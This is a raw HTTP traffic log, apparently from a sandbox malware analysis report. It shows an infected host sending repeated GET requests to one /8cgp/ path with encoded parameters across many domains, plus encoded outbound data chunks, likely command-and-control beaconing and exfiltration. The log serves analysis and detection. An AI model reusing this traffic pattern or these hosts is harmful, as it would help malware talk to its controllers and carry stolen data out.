                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                                                                    Apr 24, 2024 12:33:58.820136070 CEST5156OUTData Raw: 61 2b 79 4d 75 75 57 75 6d 49 51 47 49 34 30 43 37 31 73 38 42 55 49 64 35 6e 35 49 4c 50 38 77 4b 35 56 51 4a 54 73 51 32 70 42 49 49 6f 31 59 62 51 69 76 4b 45 73 59 52 4e 54 31 4c 44 4c 31 42 48 2f 2b 47 64 59 68 70 68 55 4e 65 72 41 54 58 61
                                                                    Data Ascii: a+yMuuWumIQGI40C71s8BUId5n5ILP8wK5VQJTsQ2pBIIo1YbQivKEsYRNT1LDL1BH/+GdYhphUNerATXaWi4FHpwULoGdyT+hirXU03mezzdA7OH+2ov5EpcjxE3aZWMUVKSvVc5V/Ep11iUSnE4SoHVwtvSGbCNrIiPqYLwvfMuEuhjVoogCyg7faL1tjNUK67pQWYuOVV6Lcs1bGQcR7nmf97U6AO8M3/kNqPl6AuNiZnrN8
                                                                    Apr 24, 2024 12:33:58.820178986 CEST6445OUTData Raw: 75 69 72 6d 2f 6d 66 68 75 59 32 77 31 32 4e 49 75 33 70 41 42 43 44 38 41 4d 53 6d 32 37 32 67 4a 37 31 59 61 47 55 59 38 63 72 42 59 78 43 66 56 4a 62 30 47 41 62 45 69 52 71 51 6b 6f 4d 37 6f 52 74 33 35 4c 44 49 4a 44 48 4a 2f 2b 4e 53 74 33
                                                                    Data Ascii: uirm/mfhuY2w12NIu3pABCD8AMSm272gJ71YaGUY8crBYxCfVJb0GAbEiRqQkoM7oRt35LDIJDHJ/+NSt34Vp1X27bYLAE6USvRD6GjDypBTysuV+G3NJa74L5VhzJOqS70n5EvqDmDLh9/okS9jMEQluOiNuxtvxJF2OzjxbmsiQm14gUtoZe0MGzOiWxvaJynm2qKyO1WxPUZG264+P/vqXTqUiUS8W8MWN1QWNElTFPnXfkl
                                                                    Apr 24, 2024 12:33:58.820225000 CEST3148OUTData Raw: 57 46 48 42 65 78 6f 72 6d 67 49 65 68 39 73 33 54 39 4d 55 75 48 65 71 71 57 6c 58 48 4e 67 64 76 57 53 75 65 79 56 6a 69 38 69 67 6a 48 66 6c 54 44 50 70 65 42 72 78 6d 39 6b 44 6f 64 68 47 64 62 57 67 30 61 73 78 78 77 58 4c 50 64 6a 75 79 52
                                                                    Data Ascii: WFHBexormgIeh9s3T9MUuHeqqWlXHNgdvWSueyVji8igjHflTDPpeBrxm9kDodhGdbWg0asxxwXLPdjuyR04tZw8CEfCGlnqUALezqkZu9Uvkm2g8r2nI7QgzsHQk9kM14A9WV/GeOyWi7E3RbRISXpzvV7+jX4ZgVMgVJvWLbvfEqG3nhX93amOZuHZktPwpYz6CovhAl9ZfueQs/VxI/anRDx3QLcEpSdShVYrrBBjPyX33ga


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    73192.168.11.205032291.195.240.1980
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:34:01.040357113 CEST404OUTGET /8cgp/?Xh9lX=fnwN1v/cGsL5Viy/xGPo7bu3BFyPSCGRcDxJWuOrmZaTk6+QfBJJ6K85NdT8x6wg+kdjGkUCY343uxqa5Yt4yEVQtg3mZjTzeLq2Z0Ov3khzfcaVVj80n48=&ad64=U4M8cbh8kd HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.concretedailypress.net
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:34:01.351702929 CEST107INHTTP/1.1 439
                                                                    date: Wed, 24 Apr 2024 10:34:01 GMT
                                                                    content-length: 0
                                                                    server: NginX
                                                                    connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    74192.168.11.2050327137.220.252.4080
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:34:28.475857973 CEST393OUTGET /8cgp/?Xh9lX=27hjRPCyRlHKx+9Yvp9X/66HqVrlT4yXNX1Fx10RnhcFdFyjtbgqtspXt/m7h19M1tNaQu/ADV6ErOuMACLC0xl2a7R1sTqGKQn1UwmaLCfsUIitr9DM5TM=&ad64=U4M8cbh8kd HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.387mfyr.sbs
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:34:28.741910934 CEST289INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:34:28 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 146
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    75192.168.11.205032851.77.215.15180
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:34:34.056957006 CEST392OUTGET /8cgp/?QDnH=ERXP8&Xh9lX=Rt3kyQgIVYud0ZxfjVmkNGlq6oguJ3Bu0zZO/jPZwrZwphqha226ELu53C2wC06UMZB3RXlB5IubdFV8wNllBFtqfqdEgmnsNC5NpQzeW4FZZkQ+d4TAHSc= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.arilyfarlico.ru
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:34:34.361831903 CEST197INHTTP/1.1 200 OK
                                                                    Date: Wed, 24 Apr 2024 10:34:34 GMT
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Content-Length: 20
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Data Raw: 55 6e 6b 6e 6f 77 6e 20 72 65 71 75 65 73 74 20 74 79 70 65
                                                                    Data Ascii: Unknown request type


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    76192.168.11.205032964.190.62.2280
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:34:39.689107895 CEST398OUTGET /8cgp/?Xh9lX=0rOrON9KCedqtp/KEErYODOsqb1Ol5SKTVjby8oNAnBpXQ3f6KiEeGIyIQ0Oonef/1tP4f58WruRrbReuj87L8qx+pUtt26y1FhkvVaaULxp4u5kv8q4N/k=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.donantedeovulos.space
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:34:39.999948025 CEST107INHTTP/1.1 439
                                                                    date: Wed, 24 Apr 2024 10:34:39 GMT
                                                                    content-length: 0
                                                                    server: NginX
                                                                    connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    77192.168.11.2050330108.186.8.15580
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:34:55.528579950 CEST388OUTGET /8cgp/?QDnH=ERXP8&Xh9lX=TrWImKkXg72XbxtkItxdCHOg9XWXWDqE4iO1qHTBwn9T3tQecLtkumbZqYeYuSkxtGpQmOvVFI5PSbSpBsnHilSWnmtQ3orkxGs2pUIdqKkLQC6qurdmbFs= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.kader42.top
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:34:55.698564053 CEST209INHTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:34:54 GMT
                                                                    Connection: close
                                                                    Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                    Data Ascii: 3
                                                                    Apr 24, 2024 12:34:55.698673964 CEST805INData Raw: 33 31 65 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 e5 a8
                                                                    Data Ascii: 31e<html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script>(function(){ var bp = document.c
                                                                    Apr 24, 2024 12:34:55.698700905 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    78192.168.11.205033184.32.84.3280
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:35:01.895152092 CEST390OUTGET /8cgp/?Xh9lX=/YVHZOSW055QRFdzHV7EG4MPV06WciwOGAsmatOqDuiKItV6nqBs0pBRyzlLrNgNpWUhFR7Gbz8/7vzQvyrSOcbiMu9Z7oEFzfRxNbVqKIwXHjZvBpZwwR0=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.noispisok.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:35:02.230283976 CEST1289INHTTP/1.1 200 OK
                                                                    Server: hcdn
                                                                    Date: Wed, 24 Apr 2024 10:35:02 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 10072
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    x-hcdn-request-id: e44bf6636d2b963a5facac7a467db33e-asc-edge3
                                                                    Expires: Wed, 24 Apr 2024 10:35:01 GMT
                                                                    Cache-Control: no-cache
                                                                    Accept-Ranges: bytes
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 32 2e 31 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 35 2e 33 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 26 73 75 62 73 65 74 3d 63 79 72 69 6c 6c 69 63 2c 63 79 72 69 6c 6c 69 63 2d 65 78 74 2c 67 72 65 65 6b 2c 67 72 65 65 6b 2d 65 78 74 2c 6c 61 74 69 6e 2d 65 78 74 2c 76 69 65 74 6e 61 6d 65 73 65 22 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b
                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;
                                                                    Apr 24, 2024 12:35:02.230298996 CEST1289INData Raw: 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66
                                                                    Data Ascii: margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:6
                                                                    Apr 24, 2024 12:35:02.230393887 CEST1289INData Raw: 33 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74
                                                                    Data Ascii: 3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;li
                                                                    Apr 24, 2024 12:35:02.230407953 CEST1289INData Raw: 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78
                                                                    Data Ascii: ize:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width
                                                                    Apr 24, 2024 12:35:02.230420113 CEST1289INData Raw: 72 69 61 6c 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c
                                                                    Data Ascii: rials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www
                                                                    Apr 24, 2024 12:35:02.230437040 CEST1289INData Raw: 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72
                                                                    Data Ascii: hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add w
                                                                    Apr 24, 2024 12:35:02.230448008 CEST1289INData Raw: 5b 5d 2c 6e 3d 30 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28
                                                                    Data Ascii: [],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join(""
                                                                    Apr 24, 2024 12:35:02.230458975 CEST1289INData Raw: 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66
                                                                    Data Ascii: ice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf1
                                                                    Apr 24, 2024 12:35:02.230468035 CEST100INData Raw: 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28
                                                                    Data Ascii: ,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    79192.168.11.2050332118.27.122.21480
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:35:07.528105021 CEST392OUTGET /8cgp/?QDnH=ERXP8&Xh9lX=IdWor3433k1T0EOhXt9dLiY9DbR+hWBcDBqvgnp+doAH8LsyGz9SvmmDD05EUVbRqIr7chpXUFkFyWAkdZSUbSWj4Fm/Hc2PGDqx2ZME3zVnMVls2zAW0u4= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.kansaiwoody.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:35:07.810910940 CEST359INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:35:07 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 196
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    80192.168.11.2050333157.7.107.6380
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:35:13.105195999 CEST396OUTGET /8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.a-two-spa-salon.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:35:13.579597950 CEST507INHTTP/1.1 301 Moved Permanently
                                                                    Date: Wed, 24 Apr 2024 10:35:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.18
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    X-Redirect-By: WordPress
                                                                    Location: http://a-two-spa-salon.com/8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8
                                                                    X-Cache: MISS


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    81192.168.11.2050334203.161.49.19380
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:35:23.936424971 CEST389OUTGET /8cgp/?Xh9lX=983bcoiGgeytF04qoACGbDKY/XdXjFbfWR4mUmAai3szv0RRsFt8B5NwzCzTf8Kup64VkssKhH1SAFuTkhM3B+3j/r4OeS1gek1PDXkJF4iS0+BJcCSan5A=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.techfun.info
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:35:24.130976915 CEST548INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:35:24 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
